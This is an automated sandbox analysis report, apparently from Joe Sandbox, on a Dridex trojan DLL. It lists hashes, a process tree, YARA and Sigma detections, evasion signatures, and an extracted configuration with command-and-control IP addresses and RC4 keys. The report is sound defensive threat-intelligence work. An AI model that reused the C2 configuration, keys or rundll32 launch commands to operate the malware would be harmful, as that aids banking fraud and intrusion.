Play interactive tour

Edit tour

Windows Analysis Report triage_dropped_file

Overview

General Information

Sample Name:	triage_dropped_file (renamed file extension from none to dll)
Analysis ID:	544204
MD5:	d756b468c3ee8d401d53f986e12bc87c
SHA1:	300868849d964a669c6aa9598392b7851425c305
SHA256:	766ccb30a7a7c89062dd95f241a2c889bd88b41345eb8939bf6525b73391141d
Tags:	22203dlldridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3216 cmdline: loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1928 cmdline: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22203, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "aWC082P8hckVFYwbW0NrvNgAn1N8aY8XI5dpWYzY32f98jjPr2J6In9mEAVb0pn7YFhDq3TpgW"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.259136182.000000006EF41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.256603850.000000006EF41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.289153535.000000006EF41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.0.rundll32.exe.6ef40000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.6ef40000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6ef40000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6ef40000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 900, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ProcessId: 1928

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.0.rundll32.exe.6ef40000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22203, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "aWC082P8hckVFYwbW0NrvNgAn1N8aY8XI5dpWYzY32f98jjPr2J6In9mEAVb0pn7YFhDq3TpgW"]}

Multi AV Scanner detection for submitted file

Show sources

Source: triage_dropped_file.dll

Virustotal: Detection: 19%

Perma Link

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: bcrypt.pdb"A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263501507.00000000030E7000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263082463.0000000004F42000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263102038.00000000030E7000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.260411122.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263951818.00000000030E1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263097455.00000000030E1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb:A9 source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263107356.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263514508.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263717718.00000000030ED000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.263951818.00000000030E1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263097455.00000000030E1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb$A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbA? source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.260411122.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb6A- source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbY source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbZ source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.263107356.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263514508.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263717718.00000000030ED000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.263501507.00000000030E7000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263102038.00000000030E7000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb(A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb<A# source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000006.00000003.286519944.0000000004E93000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.288128512.0000000004E93000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.259160782.000000006EF5F000.00000002.00020000.sdmp	String found in binary or memory: http://www.casavalduga.com.brDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 2.0.rundll32.exe.6ef40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6ef40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6ef40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6ef40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.259136182.000000006EF41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256603850.000000006EF41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289153535.000000006EF41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Binary or memory string: OriginalFilenameIha.dllD vs triage_dropped_file.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF50730	0_2_6EF50730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF59370	0_2_6EF59370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF4A4E8	0_2_6EF4A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF41494	0_2_6EF41494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF5143C	0_2_6EF5143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF48428	0_2_6EF48428

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF52234 NtDelayExecution,		0_2_6EF52234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EF52820 NtAllocateVirtualMemory,		0_2_6EF52820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: triage_dropped_file.dll

Virustotal: Detection: 19%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1928

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2160.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: triage_dropped_file.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: bcrypt.pdb"A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263501507.00000000030E7000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263082463.0000000004F42000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263102038.00000000030E7000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.260411122.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263951818.00000000030E1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263097455.00000000030E1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb:A9 source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263107356.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263514508.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263717718.00000000030ED000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.263951818.00000000030E1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263097455.00000000030E1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb$A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbA? source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.260411122.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb6A- source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbY source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbZ source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.263107356.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263514508.00000000030ED000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263717718.00000000030ED000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.268221139.0000000005230000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.263501507.00000000030E7000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.263102038.00000000030E7000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb(A source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.268216161.0000000005261000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb<A# source: WerFault.exe, 00000006.00000003.268226672.0000000005236000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EF4F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6EF4F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
